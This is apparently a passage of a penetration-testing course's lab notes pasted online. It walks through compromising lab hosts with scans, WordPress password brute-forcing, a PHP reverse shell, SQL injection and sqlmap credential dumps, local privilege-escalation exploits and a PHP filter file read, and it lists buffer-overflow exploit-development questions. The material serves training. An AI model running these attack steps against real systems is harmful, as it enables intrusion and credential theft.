  878. echo " "
  879. sleep 1
  880. clear
  881. echo "Done, now check your results."
  882. sleep 2
  883. clear
  884. cd /tmp/NetworkAudit/scan/
  885. ls
  886.  
  887.  
  888.  
  889. ----------------------------------------------------------------------------------------------------------------------------
  890. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  891. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  892. --------------------------------------------------------------------------------------
  893.  
  894. ######################################
  895. ----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
  896. ######################################
  897.  
  898. ######################
  899. # Attacking Minotaur #
  900. ######################
  901.  
  902. Step 1: Portscan/Bannergrab the target host
  903. ---------------------------Type This-----------------------------------
  904. sudo nmap -sV 172.31.2.117
  905. -----------------------------------------------------------------------
  906.  
  907.  
  908.  
  909. Step 2: Vulnerability scan the web server
  910. ---------------------------Type This-----------------------------------
  911. nikto.pl -h 172.31.2.117
  912. -----------------------------------------------------------------------
  913.  
  914.  
  915.  
  916. Step 3: Directory brute-force the webserver
  917. ---------------------------Type This-----------------------------------
  918. dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
  919. -----------------------------------------------------------------------
  920.  
  921. ### dirb output ###
  922. ==> DIRECTORY: http://172.31.2.117/bull/
  923. -----------------------------------------------------------------------
  924.  
  925.  
  926. Step 4: Run wordpress vulnerability scanner
  927. ---------------------------Type This-----------------------------------
  928. wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
  929.  
  930.  
  931. cewl -w words.txt http://172.31.2.117/bull/
  932.  
  933.  
  934. cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
  935.  
  936. wc -l whateverbro.txt
  937.  
  938. john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
  939.  
  940. wc -l words-john.txt
  941.  
  942. wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
  943. -----------------------------------------------------------------------
  944.  
  945.  
  946.  
  947.  
  948.  
  949. Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
  950. ---------------------------Type This-----------------------------------
  951. msfconsole
  952.  
  953. use exploit/unix/webapp/wp_slideshowgallery_upload
  954.  
  955. set RHOST 172.31.2.117
  956.  
  957. set RPORT 80
  958.  
  959. set TARGETURI /bull
  960.  
  961. set WP_USER bully
  962.  
  963. set WP_PASSWORD Bighornedbulls
  964.  
  965. exploit
  966. -----------------------------------------------------------------------
  967.  
  968. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
  969. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  970. and then from the lab network attacking other students.
  971.  
  972.  
  973. ---------------------------Type This-----------------------------------
  974. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  975.  
  976. tar -zxvf php-reverse-shell-1.0.tar.gz
  977.  
  978. cd ~/toolz/php-reverse-shell-1.0/
  979.  
  980. nano php-reverse-shell.php
  981. -----------------------------------------------------------------------
  982. ***** change the $ip and $port variables to a host that you have already compromised in the network
  983. ***** for this example I chose 172.31.2.64 and kept port 1234
  984.  
  985.  
  986. ---------------------------Type This-----------------------------------
  987. chmod 777 php-reverse-shell.php
  988. cp php-reverse-shell.php ..
  989. -----------------------------------------------------------------------
  990.  
  991.  
  992.  
  993. Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
  994. Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
  995. --------------------------Type This-----------------------------------
  996. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  997.  
  998. -----------------------------------------------------------------------
  999.  
  1000.  
  1001.  
  1002. Set up netcat listener on previously compromised host
  1003. ---------------------------Type This-----------------------------------
  1004. ssh -l webmin 172.31.2.64
  1005. webmin1980
  1006.  
  1007.  
  1008. nc -lvp 1234
  1009. -----------------------------------------------------------------------
  1010.  
  1011.  
  1012.  
  1013.  
  1014. ---------------------Type This in your browser ------------------------
  1015. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  1016. -----------------------------------------------------------------------
  1017.  
  1018.  
  1019. Now check your listener to see if you got the connection
  1020. ---------------------------Type This-----------------------------------
  1021. id
  1022.  
  1023. /sbin/ifconfig
  1024.  
  1025. python -c 'import pty;pty.spawn("/bin/bash")'
  1026.  
  1027. ---------------------------Type This-----------------------------------
  1028. cd /tmp
  1029. cat >> exploit2.c << out
  1030. -----------------------------------------------------------------------
  1031. **************paste in the content from here *****************
  1032. https://www.exploit-db.com/raw/37292/
  1033.  
  1034. **************hit enter a few times *****************
  1035.  
  1036. ---------------------------Type This-----------------------------------
  1037. out
  1038.  
  1039.  
  1040. gcc -o boom2 exploit2.c
  1041.  
  1042. ./boom2
  1043.  
  1044. id
  1045. -----------------------------------------------------------------------
  1046.  
  1047.  
  1048.  
  1049.  
  1050. ---------------------------Type This-----------------------------------
  1051. sudo nmap -sV 172.31.2.181
  1052. -----------------------------------------------------------------------
  1053. PORT STATE SERVICE VERSION
  1054. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  1055.  
  1056.  
  1057. ---------------------------Type This-----------------------------------
  1058. sudo nmap -sU -p69,161 172.31.2.181
  1059. -----------------------------------------------------------------------
  1060. PORT STATE SERVICE
  1061. 69/udp closed tftp
  1062. 161/udp open snmp
  1063.  
  1064.  
  1065. ---------------------------Type This-----------------------------------
  1066. sudo apt-get -y install onesixtyone snmp
  1067.  
  1068. wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
  1069.  
  1070. onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
  1071. ----------------------------------------------------------------------
  1072. Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
  1073.  
  1074. ---------------------------Type This-----------------------------------
  1075. cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
  1076.  
  1077. onesixtyone -c snmp-community-strings.txt 172.31.2.181
  1078.  
  1079. snmpwalk -Os -c public -v 1 172.31.2.181
  1080. ---------------------------------------------------------------------
  1081.  
  1082. Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
  1083.  
  1084. Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
  1085.  
  1086. Try to SSH to the box using the credentials eric:therisingsun
  1087.  
  1088.  
  1089. ---------------------------Type This-----------------------------------
  1090. ssh -l eric 172.31.2.181
  1091. therisingsun
  1092.  
  1093. id
  1094. cat /etc/issue
  1095. uname -a
  1096. cat /etc/*release
  1097.  
  1098. ---------------------------Type This-----------------------------------
  1099. cat >> exploit.c << out
  1100.  
  1101. **************paste in the content from here *****************
  1102. https://www.exploit-db.com/raw/39166/
  1103.  
  1104.  
  1105. ------ hit enter a few times ------
  1106.  
  1107. ------ then type 'out' ----- this closes the file handle...
  1108.  
  1109.  
  1110.  
  1111. ---------------------------Type This-----------------------------------
  1112. gcc -o boom exploit.c
  1113.  
  1114. ./boom
  1115.  
  1116. id
  1117.  
  1118.  
  1119. ......YEAH - do the happy dance!!!!
  1120.  
  1121.  
  1122.  
  1123. How to go after 172.31.2.238
  1124. Reference: https://t0w3ntum.com/2017/01/07/baffle/
  1125.  
  1126.  
  1127. ---------------------------------------------------------------
  1128. sudo nmap -sV -p 3260 172.31.2.217
  1129.  
  1130.  
  1131. sudo apt install open-iscsi
  1132.  
  1133. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  1134.  
  1135. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
  1136.  
  1137. sudo iscsiadm -m node -p 172.31.2.217 --login
  1138.  
  1139. sudo /bin/bash
  1140.  
  1141. fdisk -l
  1142. ***** look for /dev/sda5 - Linux swap / Solaris *******
  1143.  
  1144. mkdir /mnt/217vm
  1145.  
  1146. mount /dev/sdb /mnt/217vm
  1147.  
  1148. cd /mnt/217vm
  1149.  
  1150. ls
  1151.  
  1152. cat flag1.txt
  1153.  
  1154. file bobsdisk.dsk
  1155.  
  1156. mkdir /media/bobsdisk
  1157.  
  1158. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1159.  
  1160. /mnt/217vm# ls
  1161.  
  1162. cd /media/bobsdisk/
  1163.  
  1164. ls
  1165.  
  1166. cat ToAlice.eml
  1167.  
  1168. file bobsdisk.dsk
  1169.  
  1170. mkdir /media/bobsdisk
  1171.  
  1172. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1173.  
  1174. /mnt/217vm# ls
  1175.  
  1176. cd /media/bobsdisk/
  1177.  
  1178. ls
  1179.  
  1180. cat ToAlice.eml
  1181.  
  1182. file ToAlice.csv.enc
  1183.  
  1184. file bobsdisk.dsk
  1185.  
  1186. pwd
  1187.  
  1188. mkdir /media/bobsdisk
  1189.  
  1190.  
  1191. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1192.  
  1193. ls
  1194.  
  1195. cd /media/bobsdisk/
  1196.  
  1197. ls
  1198.  
  1199. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1200.  
  1201. ls
  1202.  
  1203. cat ToAlice.eml | grep flag
  1204.  
  1205. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1206.  
  1207. ls
  1208.  
  1209. cat ToAlice.eml
  1210. ***** look for supercalifragilisticoespialidoso ******
  1211.  
  1212. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1213.  
  1214. supercalifragilisticoespialidoso
  1215.  
  1216.  
  1217. ls
  1218.  
  1219. cat ToAlice.csv
  1220.  
  1221. -----------------------------------------------------
  1222. Web Path,Reason
  1223. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  1224. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  1225. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  1226.  
  1227. -----------------------------------------------------
  1228.  
  1229. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  1230. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  1231. -- view source
  1232.  
  1233. Found this string in the source:
  1234. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  1235. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  1236. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  1237. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  1238. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  1239. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  1240. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  1241. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  1242. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  1243. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  1244.  
  1245. ------ https://www.base64decode.org/ -------
  1246. ------ Decoded, but didn't find a flag -----
  1247.  
  1248.  
  1249. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  1250. -- view source --
  1251. -- Nothing in source --
  1252.  
  1253. Browsed to the flag link:
  1254. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  1255. -- view source --
  1256. -- Nothing in source --
  1257.  
  1258.  
  1259. Tried a PHP base64 decode with the URL:
  1260. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  1261. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1262. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  1263.  
  1264. ------ https://www.base64decode.org/ -------
  1265. Use the string found here:
  1266. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1267.  
  1268. -------------------------------------------------------------------
  1269. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  1270. -------------------------------------------------------------------
  1271. <?php
  1272. defined ('VIAINDEX') or die('Ooooh! So close..');
  1273. ?>
  1274. <h1>Flag</h1>
  1275. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  1276. <img src="trollface.png" />
  1277. <?php
  1278. // Ok, ok. Here's your flag!
  1279. //
  1280. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  1281. //
  1282. // Well done, you're doing great so far!
  1283. // Next step. SHELL!
  1284. //
  1285. //
  1286. // Oh. That flag above? You're gonna need it...
  1287. ?>
  1288.  
  1289.  
  1290.  
  1291.  
  1292.  
  1293. ============================================ Attacking another server because I need a reverse shell =========================================
  1294. ---------------------------------------------------------------------------------------------------------------------------------------------------------
  1295.  
  1296. Attack steps:
  1297. -------------
  1298.  
  1299.  
  1300.  
  1301. Step 1: Ping sweep the target network
  1302. -------------------------------------
  1303.  
  1304.  
  1305. ---------------------------Type This-----------------------------------
  1306. nmap -sP 172.31.2.0/24
  1307. -----------------------------------------------------------------------
  1308.  
  1309.  
  1310.  
  1311. - Found 3 hosts
  1312. 172.31.2.64
  1313. 172.31.2.217
  1314. 172.31.2.238
  1315.  
  1316.  
  1317.  
  1318. Step 2: Port scan target system
  1319. -------------------------------
  1320.  
  1321.  
  1322. ---------------------------Type This-----------------------------------
  1323. nmap -sV 172.31.2.64
  1324. -----------------------------------------------------------------------
  1325.  
  1326.  
  1327.  
  1328. -------------Scan Results--------------------------------------------
  1329. PORT STATE SERVICE VERSION
  1330. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  1331. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1332. 514/tcp filtered shell
  1333. 1037/tcp filtered ams
  1334. 6667/tcp open irc ngircd
  1335. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1336. --------------------------------------------------------------------
  1337.  
  1338.  
  1339. Step 3: Vulnerability Scan the webserver
  1340. ----------------------------------------
  1341.  
  1342.  
  1343. ---------------------------Type This-----------------------------------
  1344. cd ~/toolz/
  1345.  
  1346. rm -rf nikto*
  1347.  
  1348. git clone https://github.com/sullo/nikto.git Nikto2
  1349.  
  1350. cd Nikto2/program
  1351.  
  1352. perl nikto.pl -h 172.31.2.64
  1353. -----------------------------------------------------------------------
  1354.  
  1355.  
  1356. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  1357. -----------------------------------------------------------------------------
  1358.  
  1359.  
  1360. ---------------------------Type This-----------------------------------
  1361. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1362.  
  1363. perl Webr00t.pl -h 172.31.2.64 -v
  1364. -----------------------------------------------------------------------
  1365. or with dirbuster (dirb)
  1366.  
  1367. ---------------------------Type This-----------------------------------
  1368. git clone https://github.com/v0re/dirb.git
  1369.  
  1370. cd dirb/
  1371.  
  1372. ./configure
  1373.  
  1374. make
  1375.  
  1376. dirb
  1377.  
  1378. ./dirb http://172.31.2.64 wordlists/big.txt
  1379. -----------------------------------------------------------------------
  1380.  
  1381.  
  1382.  
  1383. Step 5: Browse the web site to look for clues
  1384. ---------------------------------------------
  1385. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  1386.  
  1387.  
  1388. ..... really didn't get much from here so we just opened the web page in a browser
  1389. http://172.31.2.64/
  1390.  
  1391. .....browsed to the webpage and saw that it pointed to:
  1392. http://172.31.2.64/jabc
  1393.  
  1394. ....clicked on documentation link and found hidden text that pointed to here:
  1395. http://172.31.2.64/jabcd0cs/
  1396.  
  1397. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  1398. https://www.exploit-db.com/exploits/32075/
  1399.  
  1400. Tried the sql injection described in exploit-db:
  1401. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  1402.  
  1403. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  1404.  
  1405.  
  1406.  
  1407. Tried to run sqlmap against the target
  1408.  
  1409.  
  1410. ---------------------------Type This-----------------------------------
  1411. cd sqlmap-dev/
  1412. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  1413.  
  1414. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  1415.  
  1416. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  1417.  
  1418. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  1419.  
  1420. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  1421. -----------------------------------------------------------------------
  1422.  
  1423.  
  1424.  
  1425. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  1426. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  1427.  
  1428.  
  1429.  
  1430. ---------------------------Type This-----------------------------------
  1431. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  1432.  
  1433. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  1434. -----------------------------------------------------------------------
  1435.  
  1436. username: webmin
  1437. hash: b78aae356709f8c31118ea613980954b
  1438.  
  1439. https://hashkiller.co.uk/md5-decrypter.aspx
  1440.  
  1441. hash: b78aae356709f8c31118ea613980954b
  1442. pass: webmin1980
  1443.  
  1444.  
  1445. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  1446.  
  1447.  
  1448.  
  1449. ---------------------------Type This-----------------------------------
  1450. ssh -l webmin 172.31.2.64
  1451. webmin1980
  1452.  
  1453. id
  1454.  
  1455. cat /etc/*release
  1456. -----------------------------------------------------------------------
  1457.  
  1458.  
  1459.  
  1460. ....tired of not having a real command shell...
  1461.  
  1462.  
  1463. ---------------------------Type This-----------------------------------
  1464. python -c 'import pty;pty.spawn("/bin/bash")'
  1465.  
  1466.  
  1467. cd /tmp
  1468.  
  1469. pwd
  1470.  
  1471.  
  1472. cat >> exploit.c << out
  1473.  
  1474. **************paste in the content from here *****************
  1475. https://www.exploit-db.com/raw/39166/
  1476.  
  1477.  
  1478. ------ hit enter a few times ------
  1479.  
  1480. ------ then type 'out' ----- this closes the file handle...
  1481.  
  1482.  
  1483.  
  1484. ---------------------------Type This-----------------------------------
  1485. gcc -o boom exploit.c
  1486.  
  1487. ./boom
  1488. -----------------------------------------------------------------------
  1489.  
  1490.  
  1491. ------------exploit failed, damn let's try another one ---------
  1492.  
  1493.  
  1494.  
  1495. ---------------------------Type This-----------------------------------
  1496. cat >> exploit2.c << out
  1497.  
  1498. **************paste in the content from here *****************
  1499. https://www.exploit-db.com/raw/37292/
  1500.  
  1501.  
  1502. out
  1503.  
  1504.  
  1505. gcc -o boom2 exploit2.c
  1506.  
  1507. ./boom2
  1508.  
  1509. id
  1510.  
  1511.  
  1512. ......YEAH - do the happy dance!!!!
  1513. =============================================== Now back to the previous server ==============================================================
  1514.  
  1515.  
  1516.  
  1517.  
  1518. #######################################
  1519. ----------- ############### # Day 3: Intro to Exploit Development ################ -----------
  1520. #######################################
  1521.  
  1522. The first exploit
  1523. https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
  1524.  
  1525. SLMail Scripts Questions
  1526.  
  1527. SLmail1.py
  1528. How do you start SLMail?
  1529. What do you have to be careful of when attaching your debugger to the application?
  1530. How many As are you sending to the application?
  1531.  
  1532. SLmail2.py
  1533. What tool(s) can be used to generate a cyclic pattern?
  1534. What port are we attacking?
  1535. What verb are we attacking?
  1536.  
  1537. SLmail3.py
  1538. What is the value contained in EIP?
  1539. What is the portion of the cyclic pattern that we must search for?
  1540. What is the distance to EIP?
  1541.  
  1542. SLmail4.py
  1543. What do you overwrite EIP with in this script?
  1544. What is the length of your shellcode in this script?
  1545. What is the difference between SOCK_STREAM and SOCK_DGRAM?
  1546.  
  1547. SLmail5.py
  1548. What is struct.pack and why are we using it?
  1549. What where is our JMP ESP coming from?
  1550. What is the length of our shellcode in this script?
  1551.  
  1552. SLmail6.py
  1553. Why do you subtract the top of ESP from the bottom of ESP in this script?
  1554. What is the length of our shellcode in this script?
  1555. What is the distance to EIP in this script?
  1556.  
  1557.  
  1558. SLmail7.py
  1559. How do you test for bad characters?
  1560. What are the bad characters in this script?
  1561. What is the address of the JMP ESP in this script and what DLL does it come from?
  1562.  
  1563.  
  1564. SLmail8.py
  1565. What is DEP and how do you disable it?
  1566. What is the purpose of the stack adjustment?
  1567. What is the purpose of the NOP sled?
  1568.  
  1569.  
  1570. If you got through SLMail comfortably - then try the script below.
  1571. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
  1572.  
  1573.  
  1574. Analysis of the exploit code:
  1575. https://www.exploit-db.com/exploits/15689/
  1576. What is the target platform that this exploit works against?
  1577. What is the variable name for the distance to EIP?
  1578. What is the actual distance to EIP in bytes?
  1579. Describe what is happening in the variable ‘junk2’?
  1580.  
  1581. Analysis of the training walk-through based on EID: 15689:
  1582. https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
  1583.  
  1584. ff1.py
  1585. What does the sys module do?
  1586. What is sys.argv[1] and sys.argv[2]?
  1587. What application entry point is being attacked in this script?
  1588.  
  1589. ff2.py
  1590. Explain what is happening in lines 18 - 20
  1591. What is pattern_create.rb doing and where can I find it?
  1592. Why can’t I just double click the file to run this script?
  1593.  
  1594. ff3.py
  1595. Explain what is happening in lines 17 - to 25?
  1596. Explain what is happening in lines 30 - to 32?
  1597. Why is everything below line 35 commented out?
  1598.  
  1599. ff4.py
  1600. Explain what is happening in lines 13 - to 15.
  1601. Explain what is happening in line 19.
  1602. Why is everything below line 35 commented out?
  1603.  
  1604. Ff5.py
  1605. Explain what is happening in line 15.
  1606. What is struct.pack?.
  1607. How big is the shellcode in this script?
  1608.  
  1609. ff6.py
  1610. What is the distance to EIP?
  1611. How big is the shellcode in this script?
  1612. What is the total byte length of the data being sent to this app?
  1613.  
  1614. ff7.py
  1615. What is a tuple in python? Unchangeable list
  1616. How big is the shellcode in this script? 1000 Bytes
  1617. Did your app crash in from this script? No
  1618.  
  1619. ff8.py
  1620. How big is the shellcode in this script?
  1621. What is try/except in python?
  1622. What is socket.SOCK_STREAM in Python?
  1623.  
  1624. ff9.py
  1625. What is going on in lines 19 and 20?
  1626. What is the length of the NOPs?
  1627. What is socket.SOCK_STREAM in Python?
  1628.  
  1629. ff010.py
  1630. What is going on in lines 18 - 20?
  1631. How would a stack adjustment help this script?
Add Comment
Please, Sign In to add comment